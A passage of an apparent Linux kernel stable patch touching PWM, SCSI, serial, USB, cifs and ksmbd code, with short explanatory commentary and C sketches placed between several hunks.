+@@ -185,6 +185,8 @@ static void stm32_pwm_lp_get_state(struct pwm_chip *chip,
+ 	tmp = prd - val;
+ 	tmp = (tmp << presc) * NSEC_PER_SEC;
+ 	state->duty_cycle = DIV_ROUND_CLOSEST_ULL(tmp, rate);
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops stm32_pwm_lp_ops = {
+diff --git a/drivers/pwm/pwm-sun4i.c b/drivers/pwm/pwm-sun4i.c
+index c8445b0a33392..37d75e252d4e7 100644
+--- a/drivers/pwm/pwm-sun4i.c
++++ b/drivers/pwm/pwm-sun4i.c
+@@ -108,9 +108,9 @@ static inline void sun4i_pwm_writel(struct sun4i_pwm_chip *chip,
+ 	writel(val, chip->base + offset);
+ }
+ 
+-static void sun4i_pwm_get_state(struct pwm_chip *chip,
+-				struct pwm_device *pwm,
+-				struct pwm_state *state)
++static int sun4i_pwm_get_state(struct pwm_chip *chip,
++			       struct pwm_device *pwm,
++			       struct pwm_state *state)
+ {
+ 	struct sun4i_pwm_chip *sun4i_pwm = to_sun4i_pwm_chip(chip);
+ 	u64 clk_rate, tmp;
+@@ -132,7 +132,7 @@ static void sun4i_pwm_get_state(struct pwm_chip *chip,
+ 		state->duty_cycle = DIV_ROUND_UP_ULL(state->period, 2);
+ 		state->polarity = PWM_POLARITY_NORMAL;
+ 		state->enabled = true;
+-		return;
++		return 0;
+ 	}
+ 
+ 	if ((PWM_REG_PRESCAL(val, pwm->hwpwm) == PWM_PRESCAL_MASK) &&
+@@ -142,7 +142,7 @@ static void sun4i_pwm_get_state(struct pwm_chip *chip,
+ 		prescaler = prescaler_table[PWM_REG_PRESCAL(val, pwm->hwpwm)];
+ 
+ 	if (prescaler == 0)
+-		return;
++		return 0;
+ 
+ 	if (val & BIT_CH(PWM_ACT_STATE, pwm->hwpwm))
+ 		state->polarity = PWM_POLARITY_NORMAL;
+@@ -162,6 +162,8 @@ static void sun4i_pwm_get_state(struct pwm_chip *chip,
+ 
+ 	tmp = (u64)prescaler * NSEC_PER_SEC * PWM_REG_PRD(val);
+ 	state->period = DIV_ROUND_CLOSEST_ULL(tmp, clk_rate);
++
++	return 0;
+ }
+ 
+ static int sun4i_pwm_calculate(struct sun4i_pwm_chip *sun4i_pwm,
+diff --git a/drivers/pwm/pwm-sunplus.c b/drivers/pwm/pwm-sunplus.c
+index e776fd16512de..d6ebe9f03b354 100644
+--- a/drivers/pwm/pwm-sunplus.c
++++ b/drivers/pwm/pwm-sunplus.c
+@@ -124,8 +124,8 @@ static int sunplus_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return 0;
+ }
+ 
+-static void sunplus_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				  struct pwm_state *state)
++static int sunplus_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++				 struct pwm_state *state)
+ {
+ 	struct sunplus_pwm *priv = to_sunplus_pwm(chip);
+ 	u32 mode0, dd_freq, duty;
+@@ -155,6 +155,8 @@ static void sunplus_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	}
+ 
+ 	state->polarity = PWM_POLARITY_NORMAL;
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops sunplus_pwm_ops = {
+diff --git a/drivers/pwm/pwm-visconti.c b/drivers/pwm/pwm-visconti.c
+index 927c4cbb1daf0..e3fb79b3e2a7a 100644
+--- a/drivers/pwm/pwm-visconti.c
++++ b/drivers/pwm/pwm-visconti.c
+@@ -103,8 +103,8 @@ static int visconti_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return 0;
+ }
+ 
+-static void visconti_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				   struct pwm_state *state)
++static int visconti_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++				  struct pwm_state *state)
+ {
+ 	struct visconti_pwm_chip *priv = visconti_pwm_from_chip(chip);
+ 	u32 period, duty, pwmc0, pwmc0_clk;
+@@ -122,6 +122,8 @@ static void visconti_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm
+ 		state->polarity = PWM_POLARITY_NORMAL;
+ 
+ 	state->enabled = true;
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops visconti_pwm_ops = {
+diff --git a/drivers/pwm/pwm-xilinx.c b/drivers/pwm/pwm-xilinx.c
+index 4dab2b86c4276..f7a50fdcd9a52 100644
+--- a/drivers/pwm/pwm-xilinx.c
++++ b/drivers/pwm/pwm-xilinx.c
+@@ -169,9 +169,9 @@ static int xilinx_pwm_apply(struct pwm_chip *chip, struct pwm_device *unused,
+ 	return 0;
+ }
+ 
+-static void xilinx_pwm_get_state(struct pwm_chip *chip,
+-				 struct pwm_device *unused,
+-				 struct pwm_state *state)
++static int xilinx_pwm_get_state(struct pwm_chip *chip,
++				struct pwm_device *unused,
++				struct pwm_state *state)
+ {
+ 	struct xilinx_timer_priv *priv = xilinx_pwm_chip_to_priv(chip);
+ 	u32 tlr0, tlr1, tcsr0, tcsr1;
+@@ -191,6 +191,8 @@ static void xilinx_pwm_get_state(struct pwm_chip *chip,
+ 	 */
+ 	if (state->period == state->duty_cycle)
+ 		state->duty_cycle = 0;
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops xilinx_pwm_ops = {
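
All of the pwm driver hunks above follow one pattern: the .get_state callback is converted from void to int so that read-back errors can eventually reach the PWM core, with each driver returning 0 on its old early-exit paths for now, and several drivers additionally start reporting state->polarity explicitly. A minimal sketch of the resulting callback shape, using an entirely hypothetical driver "foo" with made-up FOO_* register names:

    #include <linux/bits.h>
    #include <linux/io.h>
    #include <linux/pwm.h>

    struct foo_pwm {
    	struct pwm_chip chip;
    	void __iomem *base;
    };

    #define FOO_PWM_CTRL		0x00
    #define FOO_PWM_ENABLE		BIT(0)
    #define FOO_PWM_PERIOD_NS	1000000

    static inline struct foo_pwm *to_foo_pwm(struct pwm_chip *chip)
    {
    	return container_of(chip, struct foo_pwm, chip);
    }

    static int foo_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
    			     struct pwm_state *state)
    {
    	struct foo_pwm *priv = to_foo_pwm(chip);
    	u32 val = readl(priv->base + FOO_PWM_CTRL);

    	state->enabled = !!(val & FOO_PWM_ENABLE);
    	state->polarity = PWM_POLARITY_NORMAL;	/* report polarity explicitly */
    	state->period = FOO_PWM_PERIOD_NS;
    	state->duty_cycle = state->enabled ? state->period / 2 : 0;

    	return 0;	/* the hunks above still return 0 even on early exits */
    }
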
+diff --git a/drivers/scsi/iscsi_tcp.c b/drivers/scsi/iscsi_tcp.c
+index c3ad04ad66e0a..8009eab3b7bee 100644
+--- a/drivers/scsi/iscsi_tcp.c
++++ b/drivers/scsi/iscsi_tcp.c
+@@ -767,13 +767,12 @@ static int iscsi_sw_tcp_conn_set_param(struct iscsi_cls_conn *cls_conn,
+ 		iscsi_set_param(cls_conn, param, buf, buflen);
+ 		break;
+ 	case ISCSI_PARAM_DATADGST_EN:
+-		iscsi_set_param(cls_conn, param, buf, buflen);
+-
+ 		mutex_lock(&tcp_sw_conn->sock_lock);
+ 		if (!tcp_sw_conn->sock) {
+ 			mutex_unlock(&tcp_sw_conn->sock_lock);
+ 			return -ENOTCONN;
+ 		}
++		iscsi_set_param(cls_conn, param, buf, buflen);
+ 		tcp_sw_conn->sendpage = conn->datadgst_en ?
+ 			sock_no_sendpage : tcp_sw_conn->sock->ops->sendpage;
+ 		mutex_unlock(&tcp_sw_conn->sock_lock);
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 7d2d872bae3c5..08dc825fbf4f6 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -3608,6 +3608,7 @@ skip_dpc:
+ probe_failed:
+ 	qla_enode_stop(base_vha);
+ 	qla_edb_stop(base_vha);
++	vfree(base_vha->scan.l);
+ 	if (base_vha->gnl.l) {
+ 		dma_free_coherent(&ha->pdev->dev, base_vha->gnl.size,
+ 				base_vha->gnl.l, base_vha->gnl.ldma);
+diff --git a/drivers/tty/serial/8250/8250_port.c b/drivers/tty/serial/8250/8250_port.c
+index 388172289627a..2a3bd6918c77e 100644
+--- a/drivers/tty/serial/8250/8250_port.c
++++ b/drivers/tty/serial/8250/8250_port.c
+@@ -1897,6 +1897,17 @@ EXPORT_SYMBOL_GPL(serial8250_modem_status);
+ static bool handle_rx_dma(struct uart_8250_port *up, unsigned int iir)
+ {
+ 	switch (iir & 0x3f) {
++	case UART_IIR_THRI:
++		/*
++		 * Postpone DMA or not decision to IIR_RDI or IIR_RX_TIMEOUT
++		 * because it's impossible to do an informed decision about
++		 * that with IIR_THRI.
++		 *
++		 * This also fixes one known DMA Rx corruption issue where
++		 * DR is asserted but DMA Rx only gets a corrupted zero byte
++		 * (too early DR?).
++		 */
++		return false;
+ 	case UART_IIR_RDI:
+ 		if (!up->dma->rx_running)
+ 			break;
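
The 8250 hunk above makes handle_rx_dma() bail out on a transmitter-empty interrupt, since THRI says nothing about the receiver. A self-contained userspace sketch of that dispatch, where returning false means "leave the Rx path alone for this interrupt"; the IIR values are as defined in include/uapi/linux/serial_reg.h, and only the THRI case is taken from the hunk — the RDI/RX_TIMEOUT handling here is a placeholder assumption:

    #include <stdbool.h>
    #include <stdio.h>

    #define UART_IIR_THRI		0x02	/* transmitter holding register empty */
    #define UART_IIR_RDI		0x04	/* received data available */
    #define UART_IIR_RX_TIMEOUT	0x0c	/* character timeout */

    static bool rx_needs_pio(unsigned int iir)
    {
    	switch (iir & 0x3f) {
    	case UART_IIR_THRI:
    		return false;	/* Tx-only event, decide on a later Rx event */
    	case UART_IIR_RDI:
    	case UART_IIR_RX_TIMEOUT:
    		return true;	/* assumption for the sketch only */
    	default:
    		return false;
    	}
    }

    int main(void)
    {
    	printf("THRI -> %d, RDI -> %d\n",
    	       rx_needs_pio(UART_IIR_THRI), rx_needs_pio(UART_IIR_RDI));
    	return 0;
    }
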
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index cd98c04de0330..48eb5fea62fd0 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -838,11 +838,17 @@ static unsigned int lpuart32_tx_empty(struct uart_port *port)
+ 			struct lpuart_port, port);
+ 	unsigned long stat = lpuart32_read(port, UARTSTAT);
+ 	unsigned long sfifo = lpuart32_read(port, UARTFIFO);
++	unsigned long ctrl = lpuart32_read(port, UARTCTRL);
+ 
+ 	if (sport->dma_tx_in_progress)
+ 		return 0;
+ 
+-	if (stat & UARTSTAT_TC && sfifo & UARTFIFO_TXEMPT)
++	/*
++	 * LPUART Transmission Complete Flag may never be set while queuing a break
++	 * character, so avoid checking for transmission complete when UARTCTRL_SBK
++	 * is asserted.
++	 */
++	if ((stat & UARTSTAT_TC && sfifo & UARTFIFO_TXEMPT) || ctrl & UARTCTRL_SBK)
+ 		return TIOCSER_TEMT;
+ 
+ 	return 0;
+diff --git a/drivers/tty/serial/sh-sci.c b/drivers/tty/serial/sh-sci.c
+index 62f773286d44b..e67d3a886bf4f 100644
+--- a/drivers/tty/serial/sh-sci.c
++++ b/drivers/tty/serial/sh-sci.c
+@@ -31,6 +31,7 @@
+ #include <linux/ioport.h>
+ #include <linux/ktime.h>
+ #include <linux/major.h>
++#include <linux/minmax.h>
+ #include <linux/module.h>
+ #include <linux/mm.h>
+ #include <linux/of.h>
+@@ -2867,6 +2868,13 @@ static int sci_init_single(struct platform_device *dev,
+ 			sci_port->irqs[i] = platform_get_irq(dev, i);
+ 	}
+ 
++	/*
++	 * The fourth interrupt on SCI port is transmit end interrupt, so
++	 * shuffle the interrupts.
++	 */
++	if (p->type == PORT_SCI)
++		swap(sci_port->irqs[SCIx_BRI_IRQ], sci_port->irqs[SCIx_TEI_IRQ]);
++
+ 	/* The SCI generates several interrupts. They can be muxed together or
+ 	 * connected to different interrupt lines. In the muxed case only one
+ 	 * interrupt resource is specified as there is only one interrupt ID.
+@@ -2932,7 +2940,7 @@ static int sci_init_single(struct platform_device *dev,
+ 	port->flags		= UPF_FIXED_PORT | UPF_BOOT_AUTOCONF | p->flags;
+ 	port->fifosize		= sci_port->params->fifosize;
+ 
+-	if (port->type == PORT_SCI) {
++	if (port->type == PORT_SCI && !dev->dev.of_node) {
+ 		if (sci_port->reg_size >= 0x20)
+ 			port->regshift = 2;
+ 		else
+diff --git a/drivers/usb/cdns3/cdnsp-ep0.c b/drivers/usb/cdns3/cdnsp-ep0.c
+index d63d5d92f2554..f317d3c847810 100644
+--- a/drivers/usb/cdns3/cdnsp-ep0.c
++++ b/drivers/usb/cdns3/cdnsp-ep0.c
+@@ -414,7 +414,7 @@ static int cdnsp_ep0_std_request(struct cdnsp_device *pdev,
+ void cdnsp_setup_analyze(struct cdnsp_device *pdev)
+ {
+ 	struct usb_ctrlrequest *ctrl = &pdev->setup;
+-	int ret = 0;
++	int ret = -EINVAL;
+ 	u16 len;
+ 
+ 	trace_cdnsp_ctrl_req(ctrl);
+@@ -424,7 +424,6 @@ void cdnsp_setup_analyze(struct cdnsp_device *pdev)
+ 
+ 	if (pdev->gadget.state == USB_STATE_NOTATTACHED) {
+ 		dev_err(pdev->dev, "ERR: Setup detected in unattached state\n");
+-		ret = -EINVAL;
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/usb/dwc3/dwc3-pci.c b/drivers/usb/dwc3/dwc3-pci.c
+index a23ddbb819795..560793545362a 100644
+--- a/drivers/usb/dwc3/dwc3-pci.c
++++ b/drivers/usb/dwc3/dwc3-pci.c
+@@ -49,6 +49,7 @@
+ #define PCI_DEVICE_ID_INTEL_RPLS		0x7a61
+ #define PCI_DEVICE_ID_INTEL_MTLM		0x7eb1
+ #define PCI_DEVICE_ID_INTEL_MTLP		0x7ec1
++#define PCI_DEVICE_ID_INTEL_MTLS		0x7f6f
+ #define PCI_DEVICE_ID_INTEL_MTL			0x7e7e
+ #define PCI_DEVICE_ID_INTEL_TGL			0x9a15
+ #define PCI_DEVICE_ID_AMD_MR			0x163a
+@@ -474,6 +475,9 @@ static const struct pci_device_id dwc3_pci_id_table[] = {
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTLP),
+ 	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
+ 
++	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTLS),
++	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
++
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTL),
+ 	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
+ 
+diff --git a/drivers/usb/host/xhci-tegra.c b/drivers/usb/host/xhci-tegra.c
+index bdb776553826b..32df571bb2339 100644
+--- a/drivers/usb/host/xhci-tegra.c
++++ b/drivers/usb/host/xhci-tegra.c
+@@ -1225,6 +1225,9 @@ static void tegra_xhci_id_work(struct work_struct *work)
+ 
+ 	mutex_unlock(&tegra->lock);
+ 
++	tegra->otg_usb3_port = tegra_xusb_padctl_get_usb3_companion(tegra->padctl,
++								    tegra->otg_usb2_port);
++
+ 	if (tegra->host_mode) {
+ 		/* switch to host mode */
+ 		if (tegra->otg_usb3_port >= 0) {
+@@ -1339,9 +1342,6 @@ static int tegra_xhci_id_notify(struct notifier_block *nb,
+ 	}
+ 
+ 	tegra->otg_usb2_port = tegra_xusb_get_usb2_port(tegra, usbphy);
+-	tegra->otg_usb3_port = tegra_xusb_padctl_get_usb3_companion(
+-							tegra->padctl,
+-							tegra->otg_usb2_port);
+ 
+ 	tegra->host_mode = (usbphy->last_event == USB_EVENT_ID) ? true : false;
+ 
+diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c
+index 2b280beb00115..c02ad4f76bb3c 100644
+--- a/drivers/usb/host/xhci.c
++++ b/drivers/usb/host/xhci.c
+@@ -9,6 +9,7 @@
+  */
+ 
+ #include <linux/pci.h>
++#include <linux/iommu.h>
+ #include <linux/iopoll.h>
+ #include <linux/irq.h>
+ #include <linux/log2.h>
+@@ -228,6 +229,7 @@ int xhci_reset(struct xhci_hcd *xhci, u64 timeout_us)
+ static void xhci_zero_64b_regs(struct xhci_hcd *xhci)
+ {
+ 	struct device *dev = xhci_to_hcd(xhci)->self.sysdev;
++	struct iommu_domain *domain;
+ 	int err, i;
+ 	u64 val;
+ 	u32 intrs;
+@@ -246,7 +248,9 @@ static void xhci_zero_64b_regs(struct xhci_hcd *xhci)
+ 	 * an iommu. Doing anything when there is no iommu is definitely
+ 	 * unsafe...
+ 	 */
+-	if (!(xhci->quirks & XHCI_ZERO_64B_REGS) || !device_iommu_mapped(dev))
++	domain = iommu_get_domain_for_dev(dev);
++	if (!(xhci->quirks & XHCI_ZERO_64B_REGS) || !domain ||
++	    domain->type == IOMMU_DOMAIN_IDENTITY)
+ 		return;
+ 
+ 	xhci_info(xhci, "Zeroing 64bit base registers, expecting fault\n");
+@@ -4406,6 +4410,7 @@ static int __maybe_unused xhci_change_max_exit_latency(struct xhci_hcd *xhci,
+ 
+ 	if (!virt_dev || max_exit_latency == virt_dev->current_mel) {
+ 		spin_unlock_irqrestore(&xhci->lock, flags);
++		xhci_free_command(xhci, command);
+ 		return 0;
+ 	}
+ 
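
The xhci_zero_64b_regs() hunk above tightens the guard on the register-zeroing quirk: device_iommu_mapped() is also true for passthrough setups, while the quirk only makes sense when DMA is actually translated, so the code now fetches the domain and skips identity domains. The check in isolation, as a sketch using the same iommu API:

    #include <linux/device.h>
    #include <linux/iommu.h>

    /* True only when the device sits behind a translating IOMMU domain;
     * an identity (passthrough) domain leaves DMA untranslated. */
    static bool dev_dma_is_translated(struct device *dev)
    {
    	struct iommu_domain *domain = iommu_get_domain_for_dev(dev);

    	return domain && domain->type != IOMMU_DOMAIN_IDENTITY;
    }
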
+diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c
+index ba5638471de49..f1d7a5a863aa4 100644
+--- a/drivers/usb/serial/cp210x.c
++++ b/drivers/usb/serial/cp210x.c
+@@ -120,6 +120,7 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(0x10C4, 0x826B) }, /* Cygnal Integrated Products, Inc., Fasttrax GPS demonstration module */
+ 	{ USB_DEVICE(0x10C4, 0x8281) }, /* Nanotec Plug & Drive */
+ 	{ USB_DEVICE(0x10C4, 0x8293) }, /* Telegesis ETRX2USB */
++	{ USB_DEVICE(0x10C4, 0x82AA) }, /* Silicon Labs IFS-USB-DATACABLE used with Quint UPS */
+ 	{ USB_DEVICE(0x10C4, 0x82EF) }, /* CESINEL FALCO 6105 AC Power Supply */
+ 	{ USB_DEVICE(0x10C4, 0x82F1) }, /* CESINEL MEDCAL EFD Earth Fault Detector */
+ 	{ USB_DEVICE(0x10C4, 0x82F2) }, /* CESINEL MEDCAL ST Network Analyzer */
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index a8534065e0d6d..fc12fee66141f 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -1198,6 +1198,8 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0, 0) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, 0x0900, 0xff, 0, 0), /* RM500U-CN */
++	  .driver_info = ZLP },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200U, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200S_CN, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200T, 0xff, 0, 0) },
+@@ -1300,6 +1302,14 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = NCTRL(0) | RSVD(1) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1075, 0xff),	/* Telit FN990 (PCIe) */
+ 	  .driver_info = RSVD(0) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1080, 0xff),	/* Telit FE990 (rmnet) */
++	  .driver_info = NCTRL(0) | RSVD(1) | RSVD(2) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1081, 0xff),	/* Telit FE990 (MBIM) */
++	  .driver_info = NCTRL(0) | RSVD(1) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1082, 0xff),	/* Telit FE990 (RNDIS) */
++	  .driver_info = NCTRL(2) | RSVD(3) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1083, 0xff),	/* Telit FE990 (ECM) */
++	  .driver_info = NCTRL(0) | RSVD(1) },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, TELIT_PRODUCT_ME910),
+ 	  .driver_info = NCTRL(0) | RSVD(1) | RSVD(3) },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, TELIT_PRODUCT_ME910_DUAL_MODEM),
+diff --git a/drivers/usb/typec/altmodes/displayport.c b/drivers/usb/typec/altmodes/displayport.c
+index 3a42313d0d66e..4075c0d7e6a2c 100644
+--- a/drivers/usb/typec/altmodes/displayport.c
++++ b/drivers/usb/typec/altmodes/displayport.c
+@@ -112,8 +112,12 @@ static int dp_altmode_configure(struct dp_altmode *dp, u8 con)
+ 		if (dp->data.status & DP_STATUS_PREFER_MULTI_FUNC &&
+ 		    pin_assign & DP_PIN_ASSIGN_MULTI_FUNC_MASK)
+ 			pin_assign &= DP_PIN_ASSIGN_MULTI_FUNC_MASK;
+-		else if (pin_assign & DP_PIN_ASSIGN_DP_ONLY_MASK)
++		else if (pin_assign & DP_PIN_ASSIGN_DP_ONLY_MASK) {
+ 			pin_assign &= DP_PIN_ASSIGN_DP_ONLY_MASK;
++			/* Default to pin assign C if available */
++			if (pin_assign & BIT(DP_PIN_ASSIGN_C))
++				pin_assign = BIT(DP_PIN_ASSIGN_C);
++		}
+ 
+ 		if (!pin_assign)
+ 			return -EINVAL;
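
The displayport hunk above prefers pin assignment C whenever it survives the DP-only masking, instead of taking whatever assignment a later lowest-bit pick would yield. Since the capabilities are a bitmask of BIT(DP_PIN_ASSIGN_x) values, the selection reduces to the following userspace sketch (the bit index for C is assumed from the driver's BIT() usage):

    #include <stdio.h>

    #define DP_PIN_ASSIGN_C	2	/* bit index, assumed from the altmode header */
    #define BIT(n)		(1u << (n))

    int main(void)
    {
    	unsigned int pin_assign = BIT(DP_PIN_ASSIGN_C) | BIT(3) | BIT(4);

    	/* Collapse to pin assignment C if the partner offers it. */
    	if (pin_assign & BIT(DP_PIN_ASSIGN_C))
    		pin_assign = BIT(DP_PIN_ASSIGN_C);

    	printf("chosen assignment mask: %#x\n", pin_assign);
    	return 0;
    }
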
+diff --git a/fs/cifs/fs_context.c b/fs/cifs/fs_context.c
+index 45119597c7655..89e810b27a4bf 100644
+--- a/fs/cifs/fs_context.c
++++ b/fs/cifs/fs_context.c
+@@ -441,13 +441,14 @@ out:
+  * but there are some bugs that prevent rename from working if there are
+  * multiple delimiters.
+  *
+- * Returns a sanitized duplicate of @path. The caller is responsible for
+- * cleaning up the original.
++ * Returns a sanitized duplicate of @path. @gfp indicates the GFP_* flags
++ * for kstrdup.
++ * The caller is responsible for freeing the original.
+  */
+ #define IS_DELIM(c) ((c) == '/' || (c) == '\\')
+-static char *sanitize_path(char *path)
++char *cifs_sanitize_prepath(char *prepath, gfp_t gfp)
+ {
+-	char *cursor1 = path, *cursor2 = path;
++	char *cursor1 = prepath, *cursor2 = prepath;
+ 
+ 	/* skip all prepended delimiters */
+ 	while (IS_DELIM(*cursor1))
+@@ -469,7 +470,7 @@ static char *sanitize_path(char *path)
+ 		cursor2--;
+ 
+ 	*(cursor2) = '\0';
+-	return kstrdup(path, GFP_KERNEL);
++	return kstrdup(prepath, gfp);
+ }
+ 
+ /*
+@@ -531,7 +532,7 @@ smb3_parse_devname(const char *devname, struct smb3_fs_context *ctx)
+ 	if (!*pos)
+ 		return 0;
+ 
+-	ctx->prepath = sanitize_path(pos);
++	ctx->prepath = cifs_sanitize_prepath(pos, GFP_KERNEL);
+ 	if (!ctx->prepath)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/cifs/fs_context.h b/fs/cifs/fs_context.h
+index a268896d05d57..26093f54d3e65 100644
+--- a/fs/cifs/fs_context.h
++++ b/fs/cifs/fs_context.h
+@@ -287,4 +287,7 @@ extern void smb3_update_mnt_flags(struct cifs_sb_info *cifs_sb);
+  */
+ #define SMB3_MAX_DCLOSETIMEO (1 << 30)
+ #define SMB3_DEF_DCLOSETIMEO (1 * HZ) /* even 1 sec enough to help eg open/write/close/open/read */
++
++extern char *cifs_sanitize_prepath(char *prepath, gfp_t gfp);
++
+ #endif
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 832856aef4b7a..cf19e6a81ed99 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -1304,7 +1304,7 @@ int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix)
+ 	kfree(cifs_sb->prepath);
+ 
+ 	if (prefix && *prefix) {
+-		cifs_sb->prepath = kstrdup(prefix, GFP_ATOMIC);
++		cifs_sb->prepath = cifs_sanitize_prepath(prefix, GFP_ATOMIC);
+ 		if (!cifs_sb->prepath)
+ 			return -ENOMEM;
+ 
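
Both cifs call sites above now funnel through cifs_sanitize_prepath(), so a prefix set later via cifs_update_super_prepath() gets the same delimiter cleanup as one parsed from the device name: leading and trailing delimiters are stripped and runs of mixed '/' and '\' collapse to a single one. The algorithm itself, reimplemented as a self-contained userspace sketch (the kernel version additionally kstrdup()s the result):

    #include <stdio.h>
    #include <string.h>

    #define IS_DELIM(c) ((c) == '/' || (c) == '\\')

    static void sanitize_prepath(char *p)
    {
    	char *src = p, *dst = p;

    	/* skip all prepended delimiters */
    	while (IS_DELIM(*src))
    		src++;

    	while (*src) {
    		if (IS_DELIM(*src)) {
    			*dst++ = *src++;		/* keep one delimiter */
    			while (IS_DELIM(*src))		/* drop the duplicates */
    				src++;
    		} else {
    			*dst++ = *src++;
    		}
    	}

    	/* strip any trailing delimiter */
    	while (dst > p && IS_DELIM(dst[-1]))
    		dst--;
    	*dst = '\0';
    }

    int main(void)
    {
    	char path[] = "//srv\\\\share///dir\\";
    	sanitize_prepath(path);
    	printf("%s\n", path);	/* prints: srv\share/dir */
    	return 0;
    }
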
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index 2be9d7460494b..b8f9d627f241d 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -326,10 +326,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 
+ 		/* 4 for rfc1002 length field */
+ 		size = pdu_size + 4;
+-		conn->request_buf = kvmalloc(size,
+-					     GFP_KERNEL |
+-					     __GFP_NOWARN |
+-					     __GFP_NORETRY);
++		conn->request_buf = kvmalloc(size, GFP_KERNEL);
+ 		if (!conn->request_buf)
+ 			break;
+ 
+diff --git a/fs/ksmbd/server.c b/fs/ksmbd/server.c
+index a0d635304754a..651d1d01234be 100644
+--- a/fs/ksmbd/server.c
++++ b/fs/ksmbd/server.c
+@@ -289,10 +289,7 @@ static int queue_ksmbd_work(struct ksmbd_conn *conn)
+ 	work->request_buf = conn->request_buf;
+ 	conn->request_buf = NULL;
+ 
+-	if (ksmbd_init_smb_server(work)) {
+-		ksmbd_free_work_struct(work);
+-		return -EINVAL;
+-	}
++	ksmbd_init_smb_server(work);
+ 
+ 	ksmbd_conn_enqueue_request(work);
+ 	atomic_inc(&conn->r_count);
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index daaee7a89e050..4effe8df5ae92 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -235,9 +235,6 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 	struct smb2_negotiate_rsp *rsp;
+ 	struct ksmbd_conn *conn = work->conn;
+ 
+-	if (conn->need_neg == false)
+-		return -EINVAL;
+-
+ 	*(__be32 *)work->response_buf =
+ 		cpu_to_be32(conn->vals->header_size);
+ 
+diff --git a/fs/ksmbd/smb_common.c b/fs/ksmbd/smb_common.c
+index 3d9e8d8a5762b..95afb6b23a91c 100644
+--- a/fs/ksmbd/smb_common.c
++++ b/fs/ksmbd/smb_common.c
+@@ -283,20 +283,121 @@ err_out:
+ 	return BAD_PROT_ID;
+ }
+ 
+-int ksmbd_init_smb_server(struct ksmbd_work *work)
++#define SMB_COM_NEGOTIATE_EX	0x0
++
++/**
++ * get_smb1_cmd_val() - get smb command value from smb header
++ * @work:	smb work containing smb header
++ *
++ * Return:      smb command value
++ */
++static u16 get_smb1_cmd_val(struct ksmbd_work *work)
+ {
+-	struct ksmbd_conn *conn = work->conn;
++	return SMB_COM_NEGOTIATE_EX;
++}
+ 
+-	if (conn->need_neg == false)
++/**
++ * init_smb1_rsp_hdr() - initialize smb negotiate response header
